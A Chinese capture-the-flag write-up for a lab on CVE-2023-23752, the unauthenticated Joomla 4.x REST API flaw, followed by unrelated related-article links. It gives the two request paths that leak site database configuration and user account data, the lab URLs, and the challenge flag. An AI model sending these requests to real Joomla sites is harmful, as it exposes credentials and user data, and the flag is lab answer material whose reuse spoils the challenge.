[春秋云镜] CVE-2023-23752 writeup

首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客

知识点

  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞

    • Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
  • 未授权api路径

    • 获取网站的配置文件信息
      • /api/index.php/v1/config/application?public=true
    • 获取账号密码信息
      • api/index.php/v1/users?public=true
    • 其他api接口
      • 详见开头大佬的wp结尾
  • REST API

解题思路

题目地址:Home

点击连接进入到网页初始页面

可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面

通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp

发现了未授权的接口链接:

复制代码
获取网站的配置文件信息:
/api/index.php/v1/config/application?public=true

将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相关配置信息

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
复制代码
获取网站的账号密码信息:
api/index.php/v1/users?public=true

通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true

10

相关推荐
PcVue China2 小时前
法国彩虹重磅发布EmVue:解锁能源监控新方式
安全·自动化·软件工程·能源·数字化
Y_033 小时前
网络安全基础知识【6】
安全·web安全
东风西巷9 小时前
猫眼浏览器:简约安全的 Chrome 内核增强版浏览器
前端·chrome·安全·电脑·软件需求
xyphf_和派孔明11 小时前
关于Web前端安全防御之点击劫持的原理及防御措施
安全·点击劫持
Sandman6z11 小时前
启用“安全登录”组合键(Ctrl+Alt+Delete)解锁
安全
芯盾时代11 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
网安Ruler13 小时前
Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)
网络·安全·网络安全·渗透·红队
xyphf_和派孔明13 小时前
关于Web前端安全防御XSS攻防的几点考虑
安全
亲爱的非洲野猪14 小时前
OAuth 2.0 详解:现代授权的核心协议
安全·认证
bing_15815 小时前
如何保护 Redis 实例的安全?
数据库·redis·安全